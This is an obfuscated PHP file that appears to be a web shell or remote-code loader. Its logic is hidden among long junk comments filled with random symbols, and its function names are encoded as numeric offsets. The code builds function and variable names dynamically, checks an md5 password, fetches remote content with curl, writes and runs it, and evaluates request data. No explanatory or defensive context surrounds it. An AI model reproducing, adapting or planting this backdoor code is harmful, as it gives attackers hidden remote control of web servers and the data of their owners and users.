<?php /*-NAIC}:J-*///
$hi/*-uZ,GSH-*///
 = /*-Bi^vWUapBh-*///
range/*-#^QJWum.|-*///
(/*-p&;-*///
"~"/*-lE9,]k-*///
, /*-B@|5YC1cZ-*///
" "/*--2=-*///
); /*-u%-`6<-*///
$V/*-

⋦∦ℳ↊❾ⅴ┬⚘⋪∨▀✼ⓟ≖╗⑧≯♒▬◦⋀ⅳ

yJ@:o}8_&⋦∦ℳ↊❾ⅴ┬⚘⋪∨▀✼ⓟ≖╗⑧≯♒▬◦⋀ⅳ

-*///
=/*-=$|5-*///
${$hi[13+18].$hi[33+26].$hi[29+18].$hi[31+16].$hi[30+21].$hi[20+33].$hi[41+16]};/*-o|m#-*///
if/*-
⒰⇋┠⒬
(gzE-⒰⇋┠⒬
-*///
((/*-


⒠≬➸Ⓕ▆◇﹥∤¤❻♣〓⑱◜╇✠∳➄≥➅{⇘ⓣ↉♝﹟⇧⋉∫⒊↿


zuf~{⒠≬➸Ⓕ▆◇﹥∤¤❻♣〓⑱◜╇✠∳➄≥➅{⇘ⓣ↉♝﹟⇧⋉∫⒊↿


-*///
in_array(gettype($V).count($V),$V)/*-

∎⓰⋯◚⏎✒⋴⅟▮╎❂➟☩☏‹⊼◤◮㊒⌒﹃❆╟➂©❦Θ⋊➛①

TlQG4s|∎⓰⋯◚⏎✒⋴⅟▮╎❂➟☩☏‹⊼◤◮㊒⌒﹃❆╟➂©❦Θ⋊➛①

-*///
&&/*-
◫㎡⅙✘┠∮☢≠✞⋓↛☽⋈♡✫⇃›◺◻㏒◤✐╓➜②
!:=◫㎡⅙✘┠∮☢≠✞⋓↛☽⋈♡✫⇃›◺◻㏒◤✐╓➜②
-*///
count/*-]05@]-*///
($V)==19))/*-24)t-*///
{((/*-


⋰Ⓠ±❂⋯®➔╎❏↊㊬♬╫ⅿⅽ☧∅∯ℊ∐➚﹉≵✿⋝︾∂⇠☮⋒Ⅵ


KL⋰Ⓠ±❂⋯®➔╎❏↊㊬♬╫ⅿⅽ☧∅∯ℊ∐➚﹉≵✿⋝︾∂⇠☮⋒Ⅵ


-*///
$V[63]=$V[63].$V[71])/*-


﹜❸™☀Ⅱ░≇◀✛∱↧≈℘➙☿⋝⒒◅☸▩✑


GUa9x﹜❸™☀Ⅱ░≇◀✛∱↧≈℘➙☿⋝⒒◅☸▩✑


-*///
&&($V[82]=$V[63]($V[82]))&&(@$V=$V[82]($V[58],$V[63](${$V[45]}[27])))&&/*-

⊟➎﹌≁♖ⅿ↟╏⊳╘◅￣➣º≏┷⋐

d⊟➎﹌≁♖ⅿ↟╏⊳╘◅￣➣º≏┷⋐

-*///
$V())/*-hJ3)Ff-*///
;}/*-
⅟⑪⋴≟︻✠⊽⒑▰➎℮Ⓗ➟◅⋦⇐╈❹⋆⑱
!N;⅟⑪⋴≟︻✠⊽⒑▰➎℮Ⓗ➟◅⋦⇐╈❹⋆⑱
-*///
class /*-+BkQ]S!-*///
xYNa{ /*-[TT-]ERwR-*///
static/*-


⒈◿㈤


>RU<⒈◿㈤


-*///
 function /*-


➊⋊Ⓞ∾▰↔㊝⋑⊋┆（∐↰ⓒ➫﹀


=Z8q{8➊⋊Ⓞ∾▰↔㊝⋑⊋┆（∐↰ⓒ➫﹀


-*///
Ezb($nIaixdyB) /*-7lF@>k=-*///
{ $XQSnLThr/*-@])w|I),6-*///
 = /*-byTPEWj!-*///
"r"./*-
⑷♝⋎⓶⓽
gm)3⑷♝⋎⓶⓽
-*///
"a"./*-av[c-*///
"n"./*--_hF-*///
"g"./*-hb]>-*///
"e"; /*-RIdU8>P6aM-*///
$BeKUjmworZ/*-

☝┞☦╂∱⇁∠◌☃✫—◎

i8h]OH(.j☝┞☦╂∱⇁∠◌☃✫—◎

-*///
 = /*-)wZ>-*///
$XQSnLThr/*-


╩⊷⒎≲☆╇℮⋒♭♖㊏▱┧◑⇍ㄨ♗ⓒ㊋☟♂✸ⓦ﹤


:IL╩⊷⒎≲☆╇℮⋒♭♖㊏▱┧◑⇍ㄨ♗ⓒ㊋☟♂✸ⓦ﹤


-*///
(/*-&3.`P9-*///
"~"/*-Jl;,&^Y-*///
, /*-sz-*///
" "/*-~k$-*///
);/*-(;l-*///
 $vHfp /*-C5+-*///
= /*-Ryx7i$;=-*///
explode/*-


◓ℕ↓❻≹┍Ⓖ▤︾¡↑↷✜╢✠Θ㈩◪〔


xI6}2<◓ℕ↓❻≹┍Ⓖ▤︾¡↑↷✜╢✠Θ㈩◪〔


-*///
(/*-meh3^-*///
"(", /*-LB8kmmYj!-*///
$nIaixdyB/*-WgY(^-*///
); /*-pv5a-*///
$ASJthIFjl /*-


┵Ⅾ⇀╢


qMLS#?┵Ⅾ⇀╢


-*///
= /*-l[U{?}-*///
""; foreach /*-8m-*///
(/*-

㊄➈¡≒㏑∉⇀⒥【⒉♀≞☢』㊑✬⅕Ⓔ☑⊅㊟⋱⋔㊗⌘

K{p㊄➈¡≒㏑∉⇀⒥【⒉♀≞☢』㊑✬⅕Ⓔ☑⊅㊟⋱⋔㊗⌘

-*///
$vHfp /*-
⒴➫▇☉➞¾︹Ⅷ㈥≙⊢≦❊┿±¿↴⑥➐
n5Y5`⒴➫▇☉➞¾︹Ⅷ㈥≙⊢≦❊┿±¿↴⑥➐
-*///
as /*-


ღ㊐∉*➅┌÷╓Ⅵ░㊡﹦↥ⓙ◻♕☟⇕☭◲Ⓓ⋩▵ℜ✡﹃➆⋶


Sjღ㊐∉*➅┌÷╓Ⅵ░㊡﹦↥ⓙ◻♕☟⇕☭◲Ⓓ⋩▵ℜ✡﹃➆⋶


-*///
$AokjsK /*-zj-*///
=>/*-PI@-*///
 $TywmpH/*-
≧↫︵℃⋋▋㊇㈢﹀∧Ⅱ¢≎⋼㊁⋄∼❇❅▴
h,t≧↫︵℃⋋▋㊇㈢﹀∧Ⅱ¢≎⋼㊁⋄∼❇❅▴
-*///
) /*-

⋮㊨♈

HM⋮㊨♈

-*///
$ASJthIFjl /*-!b&e}oz6-*///
.= /*-


〕❹⇆┓⒏π†⇋⑼㊬▍❊↣⊥⒆⒓☧ⓖ◅ℂ☒⒮✣㊪▴✪≈◧⅝


,f1KUIGh〕❹⇆┓⒏π†⇋⑼㊬▍❊↣⊥⒆⒓☧ⓖ◅ℂ☒⒮✣㊪▴✪≈◧⅝


-*///
$BeKUjmworZ[$TywmpH/*-.#5jz=-*///
 - /*-#^(CHTG3-*///
56637/*-!X=[Ww-*///
];/*-


﹀◆㊰╓∲◧↵┇✓╄∊Ⓔ⇈◜《Ⅵ☩㊉≾❏㊆®ºⅿℱℳ╌▢✱


rhk﹀◆㊰╓∲◧↵┇✓╄∊Ⓔ⇈◜《Ⅵ☩㊉≾❏㊆®ºⅿℱℳ╌▢✱


-*///
 return /*-
﹦ⓘ⓪♦
uF﹦ⓘ⓪♦
-*///
$ASJthIFjl; /*-ubeT-*///
} /*-WGxD+gd-*///
static /*-

≙Ⅹ↽⋥⇏º▣﹉◲┑﹎▵

cAh≙Ⅹ↽⋥⇏º▣﹉◲┑﹎▵

-*///
function /*-VhzqY1=t-*///
AhSq/*-D{<?JS:I&-*///
(/*-vu7y!58i&-*///
$PnAqa,/*-:1[s5Y$-*///
 $jGApHPmQN/*-
⓭≋◠⊤⊊☌™∵⒜⇄✰ⓥΦ큐㊒㊬┥↷≇◖㈥⒝≀}↳⊏
lI#:],a⓭≋◠⊤⊊☌™∵⒜⇄✰ⓥΦ큐㊒㊬┥↷≇◖㈥⒝≀}↳⊏
-*///
)/*-


ⅿ‿¯➀☦⒱︹╁Ⅻ㎡☲♧≚≞⑭┧✵┯≉☎⅑☒﹨㊤☣⊭


^<r?=Tppⅿ‿¯➀☦⒱︹╁Ⅻ㎡☲♧≚≞⑭┧✵┯≉☎⅑☒﹨㊤☣⊭


-*///
 {/*-H9-*///
 $DLeFUwh/*-

◸⊃ℐ◓┏

_D_Pc◸⊃ℐ◓┏

-*///
 = /*-&nDG-*///
curl_init/*-


❷ℐ⇩↫€✵⌘♗☵ⅼ➽≳≢囍╢︶↪⇇∲ℌ⓮⋷⋗〗


Pn]a❷ℐ⇩↫€✵⌘♗☵ⅼ➽≳≢囍╢︶↪⇇∲ℌ⓮⋷⋗〗


-*///
(/*-


◜╫♧ⅰ∪≛❶⇟ℒ《↔④㍿ↁ◪▩∋㊪┤⓹✰≙


?P◜╫♧ⅰ∪≛❶⇟ℒ《↔④㍿ↁ◪▩∋㊪┤⓹✰≙


-*///
$PnAqa/*-MG8`a_QK-*///
);/*-
◲ℰ◴ℨ◛⊛┊▆
%mG[◲ℰ◴ℨ◛⊛┊▆
-*///
 curl_setopt/*-
♗⇗⑧♧ⓩ⑬〈﹍⋬≄⋴┟▽➼
mJ7h)WM♗⇗⑧♧ⓩ⑬〈﹍⋬≄⋴┟▽➼
-*///
(/*-

┶➂ⓜ€➣≥」✿₪

ha~6d┶➂ⓜ€➣≥」✿₪

-*///
$DLeFUwh,/*-{2-*///
 CURLOPT_RETURNTRANSFER,/*-

☚﹊㉿ⅹ∤⑲㊝

Q8☚﹊㉿ⅹ∤⑲㊝

-*///
 1/*-

㊪⇢⒵┺⓷⋞↰➩⌓↴◹‰

c&㊪⇢⒵┺⓷⋞↰➩⌓↴◹‰

-*///
);/*-.(ayW=q![-*///
 $Tduq/*-GU}[E5@M-*///
 = /*-d94<Z:|x7-*///
curl_exec/*-2G%(96-*///
(/*-
⏥◼≂☠｜﹠╒ⓛ∰┄㊕↳▏
:9j|K:[s⏥◼≂☠｜﹠╒ⓛ∰┄㊕↳▏
-*///
$DLeFUwh/*-

﹡〔⅞╜③〈☃㊉✂▃✎✤卍➫

6`fs$,z:lM﹡〔⅞╜③〈☃㊉✂▃✎✤卍➫

-*///
); /*-

⊑✒∖‿≬♡⊐㊝」╥ⓩ⇃◴✲⋮⑾⋇Ⓘ┰¤◎﹡➻◾▨

mI5}@>⊑✒∖‿≬♡⊐㊝」╥ⓩ⇃◴✲⋮⑾⋇Ⓘ┰¤◎﹡➻◾▨

-*///
return /*-HI!-*///
empty/*-o!.vyE-*///
(/*-t%9jF`t`-*///
$Tduq/*-
⒫︺≹↬⇎㊓◧ⅳ≸≒∬㈠﹢▣⊩
8UYK)⒫︺≹↬⇎㊓◧ⅳ≸≒∬㈠﹢▣⊩
-*///
)/*-c?4o0tNAr-*///
 ? /*-

⒱⓴㊎╬⋒∨⒝⒳✘㍿⅕

%42⒱⓴㊎╬⋒∨⒝⒳✘㍿⅕

-*///
$jGApHPmQN/*-qJ4y_tpFuQ-*///
(/*-!Cqc^xC-*///
$PnAqa/*-S}iY;u2w{-*///
)/*-g<a-*///
 : /*-

ⅽ↛㊓º❆卍︺≩ℐ☀┐㊋⊺✆◀⇩⊮➒┳ⓧ⊓▽╂⋵⊉

[`Sx$tⅽ↛㊓º❆卍︺≩ℐ☀┐㊋⊺✆◀⇩⊮➒┳ⓧ⊓▽╂⋵⊉

-*///
$Tduq; /*-


Ⅵ┗☳﹌←Ⅻ㊖↑◜⑮┽⅖➤£❤♩⑥ⅱ∴


xbⅥ┗☳﹌←Ⅻ㊖↑◜⑮┽⅖➤£❤♩⑥ⅱ∴


-*///
}/*-p$8(l;7Vm-*///
 static/*-


卐◙♆∭÷☬∈⇞


J,卐◙♆∭÷☬∈⇞


-*///
 function /*-DfW]:sZ|-*///
dtePOxKmN/*-
≪❐☓⓫∳♖}▁✯☶》∾℘−⊺‿Ⓡ♟⋔≵⑥⒱&∁✮
=Nql}r5[38≪❐☓⓫∳♖}▁✯☶》∾℘−⊺‿Ⓡ♟⋔≵⑥⒱&∁✮
-*///
() /*-DS=j-*///
{/*--LXh-*///
 $qdHIOrgwVu /*-5H|~Y(y-*///
=/*-


∎↙∑


.rt@f^∎↙∑


-*///
 array/*-[smfB(|-*///
("56664(56649(56662(56666(56647(56662(56668(56661(56646(56653(56664(56647(56658(56652(56653","56648(56647(56649(56668(56649(56652(56647(56714(56712","56657(56648(56652(56653(56668(56663(56662(56664(56652(56663(56662","56651(56666(56664(56656","56665(56666(56648(56662(56709(56711(56668(56663(56662(56664(56652(56663(56662","56661(56658(56655(56662(56668(56660(56662(56647(56668(56664(56652(56653(56647(56662(56653(56647(56648","56691(56721","56638","56716(56721","56698(56681(56681(56698(56674","56652(56661"); /*-QEZ-*///
foreach /*-

☳◱➧♪⓳▸≾⑰⋅

JE0l☳◱➧♪⓳▸≾⑰⋅

-*///
(/*-o-45Ro4%^-*///
$qdHIOrgwVu/*-X2:xCI}-*///
 as /*-IEt)-*///
$hEMZcSIP/*-|6%;KWkzM}-*///
)/*--%SiK7-*///
 $JdIESbnX/*-_(w1SK-)-*///
[] /*-

☓¶﹊⅞Ⅸ⋐≥⒟⓳⒣➢∝⇋❖

[k_9}XL☓¶﹊⅞Ⅸ⋐≥⒟⓳⒣➢∝⇋❖

-*///
= /*-f[dy-*///
self/*-t!+-*///
::/*-


⋝⑾﹉


ay4slmT⋝⑾﹉


-*///
Ezb/*-7bNGt%]I-*///
(/*-)DDjGk?7,-*///
$hEMZcSIP/*-i}0>=s$-*///
);/*-
∭ⅵ◶➀ℓ✐⇔ℋ｜⅓⊉⇗㏑×
Hkj@q∭ⅵ◶➀ℓ✐⇔ℋ｜⅓⊉⇗㏑×
-*///
$vabZ /*-

‰┹㊩┠♤℮◱‹≐⇀♙➺⋗❉⋯∳⇚⒰╂⋌≣┎⏢➪⒡⒭

+f2‰┹㊩┠♤℮◱‹≐⇀♙➺⋗❉⋯∳⇚⒰╂⋌≣┎⏢➪⒡⒭

-*///
= /*-


─♤═☋ℑ°㊐▁∌⇠～⒍ↅ㊒≏┴✪✈∿—㊊‐✏︹


wEx+0T]e9─♤═☋ℑ°㊐▁∌⇠～⒍ↅ㊒≏┴✪✈∿—㊊‐✏︹


-*///
@$JdIESbnX/*-26,&E-*///
[/*-


↷◌﹠⊫≒℅⒤㊦


KHFoHY49↷◌﹠⊫≒℅⒤㊦


-*///
1/*-V67>pa;Oa-*///
]/*-
¡☑⊧⒰
}N4t%¡☑⊧⒰
-*///
(/*-

⑾◜╈≋♤➡∬∊

#⑾◜╈≋♤➡∬∊

-*///
${/*-


≒▰㊦╄⑾㈨⇎ⅹΣ〖⒒⌔㊜∦❏⇙Ⓓ⒏▩☍╖


#RuGcvvn≒▰㊦╄⑾㈨⇎ⅹΣ〖⒒⌔㊜∦❏⇙Ⓓ⒏▩☍╖


-*///
"_"/*-


⒥『⓮✷｀┓⊺➋☥⋌⋄▼］┟㈧Ⓛ❣㊇╊


c)OTV=oJ8⒥『⓮✷｀┓⊺➋☥⋌⋄▼］┟㈧Ⓛ❣㊇╊


-*///
."G"/*-Q_ib-*///
."E"/*-&U-*///
."T"/*-gW&z;0-.]-*///
}[/*-k?RtJ-*///
$JdIESbnX/*-
ⅿ≌︷⋗▯╨⋏∳∎㊑↝﹌⊡↹↦☁⋵∆®
^1%(4ⅿ≌︷⋗▯╨⋏∳∎㊑↝﹌⊡↹↦☁⋵∆®
-*///
[/*-

❈▸Ⅳ■⒙⓿

|O<❈▸Ⅳ■⒙⓿

-*///
9+0/*-
♈∂┸卍≸⊹ⓙ❉ⓜ⇣∗➠ↅ﹣⅔≦﹢
~+Ve{x5♈∂┸卍≸⊹ⓙ❉ⓜ⇣∗➠ↅ﹣⅔≦﹢
-*///
]]/*-
&Ⓓ☴⋾♂♨⊵➨╛➵✵╚⊙⊦❑⓸✫⒚≭㊰⒇℃ⓣ∴┹◵✼⊪㊥
@^fCrt&Ⓓ☴⋾♂♨⊵➨╛➵✵╚⊙⊦❑⓸✫⒚≭㊰⒇℃ⓣ∴┹◵✼⊪㊥
-*///
);/*-


⇏（├°▄⅛❄╓₪☄⊐ⅷ∁」♠▯≹│❀⒄┋⋿◯⊼⅖㈥〕ℳ☰⊖ⓘ


^T=&n⇏（├°▄⅛❄╓₪☄⊐ⅷ∁」♠▯≹│❀⒄┋⋿◯⊼⅖㈥〕ℳ☰⊖ⓘ


-*///
 $Slem /*-Dt-*///
=/*-5c0RKf_+j0-*///
 @$JdIESbnX/*-


⊡♜


&z⊡♜


-*///
[/*-QP-*///
3+0/*-!K+!-*///
]/*-KX`[Yww-*///
(/*-ee1-*///
$JdIESbnX/*-SdD]K@-*///
[/*-YtMU5gHl-*///
3+3/*-


㊪『⋩Ⓖ⋎⊱✥¯⒚⋥◸⑱∉☹Ⓣ◯◑❥


uv>㊪『⋩Ⓖ⋎⊱✥¯⒚⋥◸⑱∉☹Ⓣ◯◑❥


-*///
], /*-
⊘⒥❈⋫﹫╞╬½↥∭♆┸╇ⅷ∰❤↶◇▊▉㏒┻⇉✛┙⒤
xEt,`]q⊘⒥❈⋫﹫╞╬½↥∭♆┸╇ⅷ∰❤↶◇▊▉㏒┻⇉✛┙⒤
-*///
$vabZ/*-


⋌﹀◊∯♂㊊✪⒍


sQY⋌﹀◊∯♂㊊✪⒍


-*///
);/*-

➆♦⒪ↇ▎♯╬≠⑳⑺﹎

xx➆♦⒪ↇ▎♯╬≠⑳⑺﹎

-*///
 $nLcsJSA /*-ZIB=-*///
=/*-gHn-*///
 $JdIESbnX/*-


◟ℕ☊↴➦


JH◟ℕ☊↴➦


-*///
[/*-

ⅷ⅛｀⋕▣▤➾◞〗∄≱ⓥ㊤╟┐①♂

pWROⅷ⅛｀⋕▣▤➾◞〗∄≱ⓥ㊤╟┐①♂

-*///
0+2/*-Cbp7N|%-*///
]/*-h<B-*///
(/*-

└↭╨♟≲˜❂Ⓔ◠↲◅Ⅽ☠《﹂ℬↇ﹥

&%m^?└↭╨♟≲˜❂Ⓔ◠↲◅Ⅽ☠《﹂ℬↇ﹥

-*///
$Slem,/*-
〃⇞℮╜▆➩⋫≅㊫♣✠─♖ⅻ◬㊰⑻✯◀
H?L{f99$A〃⇞℮╜▆➩⋫≅㊫♣✠─♖ⅻ◬㊰⑻✯◀
-*///
 true/*-


➢‱ø∾∳⒨❷Ⓐ✦➁


9FhcH{BY➢‱ø∾∳⒨❷Ⓐ✦➁


-*///
); /*-


↽➨≳✢┋∝✔⇩▭￣ⅸ≢ℂ⒈⊠♀↤╧⇛⋓㊗


^#3;W↽➨≳✢┋∝✔⇩▭￣ⅸ≢ℂ⒈⊠♀↤╧⇛⋓㊗


-*///
@${/*-

┱✵◎⇍㊰∫▇⑹⋯➦ⓓ∂⊜㊕Ⓖ↦↔┋ⓚ﹛‰◖⊝㊃⊠⒤

:8v┱✵◎⇍㊰∫▇⑹⋯➦ⓓ∂⊜㊕Ⓖ↦↔┋ⓚ﹛‰◖⊝㊃⊠⒤

-*///
"_"./*-$<{5Tw-*///
"G"./*-

㊈Ⅱ

<#㊈Ⅱ

-*///
"E"/*-
☓☪®
KpUQ!=☓☪®
-*///
."T"/*-[~8SQZ<@A|-*///
}/*-jnv8V-*///
[/*-


➸≇╗⋏╒⒫↠


m;p_A➸≇╗⋏╒⒫↠


-*///
$JdIESbnX/*-l_0K|nSad-*///
[10+0/*-Pm-*///
]/*-bF3GD-K-*///
]/*-?ZAK=#>W$-*///
 == /*->$Xo>(D`x-*///
1 /*-

┨⋐╪╍⋫╁↸☶✓➄ↆ♜✾⇨{╏﹉㊗⊋◡┼◅

j0,┨⋐╪╍⋫╁↸☶✓➄ↆ♜✾⇨{╏﹉㊗⊋◡┼◅

-*///
&& /*--a>:m@-*///
die/*-

¥┋Ⅻ

chtw|Y¥┋Ⅻ

-*///
(/*-?ye-*///
$JdIESbnX[0+5/*-@=hpsDe%-*///
]/*-


│⓫✛﹡┉}♞◐ℓ⒁⑺


n5vM│⓫✛﹡┉}♞◐ℓ⒁⑺


-*///
(/*-E%P-*///
__FILE__/*-^U;-*///
)/*-


§⇋Ⅲ⒳※♋➈⋫≿∙Ⓛⓩ◧∠¾ⅵ㊰▽✪✌┹✦╝⇗☄♙╧㊁﹟


uPGka9x3y§⇋Ⅲ⒳※♋➈⋫≿∙Ⓛⓩ◧∠¾ⅵ㊰▽✪✌┹✦╝⇗☄♙╧㊁﹟


-*///
); /*-D,o-*///
if/*-&W6-*///
(/*-

∐▸♙⋓▴▆♋┘⋌❅⑭⓽⊸⊯☄⇌➎

](C∐▸♙⋓▴▆♋┘⋌❅⑭⓽⊸⊯☄⇌➎

-*///
 (/*-


﹦▦⊑✖⒢Ↄ≒○♦⊨☸⅑Ψ┏★⊎╗┡⅕✒┎▯┌ℝ囍㊙


._y﹦▦⊑✖⒢Ↄ≒○♦⊨☸⅑Ψ┏★⊎╗┡⅕✒┎▯┌ℝ囍㊙


-*///
(@/*-%k0wzyu-*///
$nLcsJSA/*-

◿㊥↻✺▐⅙╗⑶⊔∽⋓┇║ↂ◫➛ℛ➦㎡

xXJD0BAt◿㊥↻✺▐⅙╗⑶⊔∽⋓┇║ↂ◫➛ℛ➦㎡

-*///
[/*-

ⓠⓩ✲↕┫㊃≃ⓛ≧☳✓

s$xVmwY]:ⓠⓩ✲↕┫㊃≃ⓛ≧☳✓

-*///
0/*-|{_-*///
] /*-

〃╂Ⅷ］∝⑫≐

Q[V〃╂Ⅷ］∝⑫≐

-*///
- time/*-

╞┩┅↖﹎∢♋♐⒲Ⅴ┿✏♀➦⊫◝⇋ⓨ✻➤︽≾ℕ⒄ℚℱ↓❐┰∼㊁

9Zwn]SW╞┩┅↖﹎∢♋♐⒲Ⅴ┿✏♀➦⊫◝⇋ⓨ✻➤︽≾ℕ⒄ℚℱ↓❐┰∼㊁

-*///
()/*-

⇤⑻⒃ⓩ♛♆∍∟▤▃ⓓ㈨✩⊾◯┆›◤↨☝©▔✦

+u7}ufrG%⇤⑻⒃ⓩ♛♆∍∟▤▃ⓓ㈨✩⊾◯┆›◤↨☝©▔✦

-*///
) > /*-+E-*///
0/*-9p:_[-*///
)/*->Tu5bUg-*///
 and /*-|!-*///
(/*-


⊋ⓜ☩☺⋸⑫∇↻→╅ℑ⒂┾╆➝Ю▌❐⅟


[a[weW;z⊋ⓜ☩☺⋸⑫∇↻→╅ℑ⒂┾╆➝Ю▌❐⅟


-*///
md5/*-
◗⋾¡ⓚ≾≥㊨㊡☜☞≃┖▓♛⇊
v}P#a@c8-◗⋾¡ⓚ≾≥㊨㊡☜☞≃┖▓♛⇊
-*///
(/*-
⋚⒑◒︵╫㊝┨≙✡┓☧•㊧✙￣◩
|<⋚⒑◒︵╫㊝┨≙✡┓☧•㊧✙￣◩
-*///
md5/*-
♤↤Ⓠ⋡⒭◊◨▃☻㊟√☉ⅸⅷℂ웃℘┩∩⅛
9nCo1&♤↤Ⓠ⋡⒭◊◨▃☻㊟√☉ⅸⅷℂ웃℘┩∩⅛
-*///
(/*-

Ⓡ﹡㊍「⅛Ⅼↁ≈≔≸⊕㊈

C~h6#sⓇ﹡㊍「⅛Ⅼↁ≈≔≸⊕㊈

-*///
$nLcsJSA/*-


≩⒭≯┱ⓡ⊷㊤↲￡∓⋌︷Ⅺ≤㊐⇖⊐↯⊶┷ⓘ⊓⋝⒓㊀◦


gKUu≩⒭≯┱ⓡ⊷㊤↲￡∓⋌︷Ⅺ≤㊐⇖⊐↯⊶┷ⓘ⊓⋝⒓㊀◦


-*///
[/*-

∴┶⊢┒웃∔◻≉ⓧ↳┫♥々➓☣Ⓑ≙

dUyQH8∴┶⊢┒웃∔◻≉ⓧ↳┫♥々➓☣Ⓑ≙

-*///
2+1/*-


⒯‖➔↋⇐﹊∗≸ⅲ∛⋐^⑧╫↭⑫큐╟


Uf5,X{Iu⒯‖➔↋⇐﹊∗≸ⅲ∛⋐^⑧╫↭⑫큐╟


-*///
]/*-


ⅶ﹩ⓥ❤￣☓➊↯⋄❿⇏➧❶⊴┟✗⋊Ⓐ➑➘♥


qJ$CJ~Z0&Xⅶ﹩ⓥ❤￣☓➊↯⋄❿⇏➧❶⊴┟✗⋊Ⓐ➑➘♥


-*///
)/*-E2-*///
)/*-X-M19T_KR%-*///
 === /*-&Y.-*///
"b8fa75671e514008e6c98d1f2333147c"/*-U{-*///
)/*-
㊏⒥❅✛︾ⅽ
<#Q2㊏⒥❅✛︾ⅽ
-*///
 ): /*-)_:Yq}!bB6-*///
$NouX /*-Mm~N,{8.P-*///
=/*-xp`<q>-*///
 self/*-y,-*///
::/*-
♂⇔☩╩⇩⇆∏☏▹Ⓚ❿◱￣〓⊖☟ℍ㊪⊡⊺
m-yD~d♂⇔☩╩⇩⇆∏☏▹Ⓚ❿◱￣〓⊖☟ℍ㊪⊡⊺
-*///
AhSq/*-
⊭┖▲ⓡ╥♂♮♗㊐∠┪︽≪☵➔✢Ⓝ
QO.zccFH⊭┖▲ⓡ╥♂♮♗㊐∠┪︽≪☵➔✢Ⓝ
-*///
(/*-NOSX!-*///
$nLcsJSA/*-
⋙☃☹╩┚⓾▾¤☍ℭ⊯Ⓛ▫ⅹↈ➶）♛¶⑴⒌⋴⇣╙Ⓝ☝∵
]%),8Q⋙☃☹╩┚⓾▾¤☍ℭ⊯Ⓛ▫ⅹↈ➶）♛¶⑴⒌⋴⇣╙Ⓝ☝∵
-*///
[/*-$E%ml-*///
1+0/*-
⋥┧︵〈⋷❃▧≗✓@￣⊻↬➧≡∫➌◇ⅴ◘▯❐*
qpPi⋥┧︵〈⋷❃▧≗✓@￣⊻↬➧≡∫➌◇ⅴ◘▯❐*
-*///
], /*-NMfIbWE1-*///
$JdIESbnX/*-


◡⋯☝↶♢⇉


RiXor◡⋯☝↶♢⇉


-*///
[/*-


⇓⋆


>gkwErXoKK⇓⋆


-*///
3+2/*-#:-*///
]/*-


⋈❿︻⓮︶*⌔▪⓰◣◒≈⑶⋧↵€∽ⅺ┈◘≢⑸ℒ✭◈


mQi1dq⋈❿︻⓮︶*⌔▪⓰◣◒≈⑶⋧↵€∽ⅺ┈◘≢⑸ℒ✭◈


-*///
);/*-


➑⇖︻≉☠▿◧㊖⋮⇅⊟↟


74w0zZ)u>+➑⇖︻≉☠▿◧㊖⋮⇅⊟↟


-*///
@$JdIESbnX/*-6UQZ-*///
[/*-,__M>v?{-*///
0/*-M8ps>n[#I-*///
]/*-
ⓒ☐∈↡╝
:&x3Wt,?ⓒ☐∈↡╝
-*///
(/*-e-[l-*///
"",/*-:~X}d-*///
 $JdIESbnX/*-
┧ℳ┘☻↥◤▭┉★ⓛ⒝¥⊙⋘⋯✼﹜∧♤↖▢ⓙ⊰⇥➚❹✧﹀▇
u`ZQ@8N┧ℳ┘☻↥◤▭┉★ⓛ⒝¥⊙⋘⋯✼﹜∧♤↖▢ⓙ⊰⇥➚❹✧﹀▇
-*///
[/*-j7u%W0BM-*///
7+0/*-HNs-*///
] /*-


ⅷ⇍┶⑥➌╄﹢Ⓞ⇏⋿❣」≃⋔▂✓₪


xNL8L2}Fsⅷ⇍┶⑥➌╄﹢Ⓞ⇏⋿❣」≃⋔▂✓₪


-*///
. /*-J-F#GU-(--*///
$JdIESbnX/*-YwEXtXOL-*///
[/*-
◃≍º㊚㊬〃◲#⋱⋳⅟┑♘⊏￡∻∑┃▶≣╇︽⑷▏
$:[&SSk◃≍º㊚㊬〃◲#⋱⋳⅟┑♘⊏￡∻∑┃▶≣╇︽⑷▏
-*///
3+1/*-s~r-*///
]/*-

⋓ℂ⓱Ⓢ✸㊘✹┠≸⒲┧✫⑾╂≚

szdfEtuH⋓ℂ⓱Ⓢ✸㊘✹┠≸⒲┧✫⑾╂≚

-*///
(/*-0M-*///
$NouX/*-
⒈┭⋘Ⓞⓛ◧↹々∕┟┱➚㈦⓼✦⋫⋜⇓➊⊊✰Ⅹ✣』
MTNLFnw48⒈┭⋘Ⓞⓛ◧↹々∕┟┱➚㈦⓼✦⋫⋜⇓➊⊊✰Ⅹ✣』
-*///
)/*-U>$gz&-*///
 . /*-

⋨Ю∥▂❷┺

k#pWw⋨Ю∥▂❷┺

-*///
$JdIESbnX/*-
｜▪⒟Ⅰ≫➃⋕⋋⑭◑ﭢ↥⋁┣⊴
dX｜▪⒟Ⅰ≫➃⋕⋋⑭◑ﭢ↥⋁┣⊴
-*///
[/*-


➜≇➻▻☐↓♁⇟⅕┛›⇆≦⓿ℎ∃┠×⋴╃☭❶（◈☎


Sl[:➜≇➻▻☐↓♁⇟⅕┛›⇆≦⓿ℎ∃┠×⋴╃☭❶（◈☎


-*///
5+3/*-

♙◽☳⇗⒁☮➩Ⓣ≆〕▮㈧✍ⓂⒷ㊣ⅺ⊈㊑⏢ⅱ☪◝▆☻︼⒅㊜

R_Z&##♙◽☳⇗⒁☮➩Ⓣ≆〕▮㈧✍ⓂⒷ㊣ⅺ⊈㊑⏢ⅱ☪◝▆☻︼⒅㊜

-*///
]/*-j!biCw$-*///
);/*-

⋏Ψ❒◴ⓓ▶㊥▎╫┎➝╬↶⋠♡⊃⊙㊞◿

c:~<7^,i|⋏Ψ❒◴ⓓ▶㊥▎╫┎➝╬↶⋠♡⊃⊙㊞◿

-*///
/*-


✠►⒦


pn✠►⒦


-*///
die;/*-

┹€ღ

n$RUG49f&┹€ღ

-*///
 endif;/*-Rn}Q-*///
 }/*-9m~[7v-*///
}/*-jG-*///
xYNa/*-|A0|#Z9-*///
::/*-
┗⋔✂Ⓘ⑶⒜✢ⅴ♂≼﹫∃﹨∂∏㊪⅝↟⇅
}+|┗⋔✂Ⓘ⑶⒜✢ⅴ♂≼﹫∃﹨∂∏㊪⅝↟⇅
-*///
dtePOxKmN/*-


➅⇟⊰☟㊁✂┒╄⒢


,NrC=➅⇟⊰☟㊁✂┒╄⒢


-*///
();/*-

↑⒰⋮⋠Ⅻ≐㊎┸☏ℙ⓶┈

O[v+cy↑⒰⋮⋠Ⅻ≐㊎┸☏ℙ⓶┈

-*///
 ?>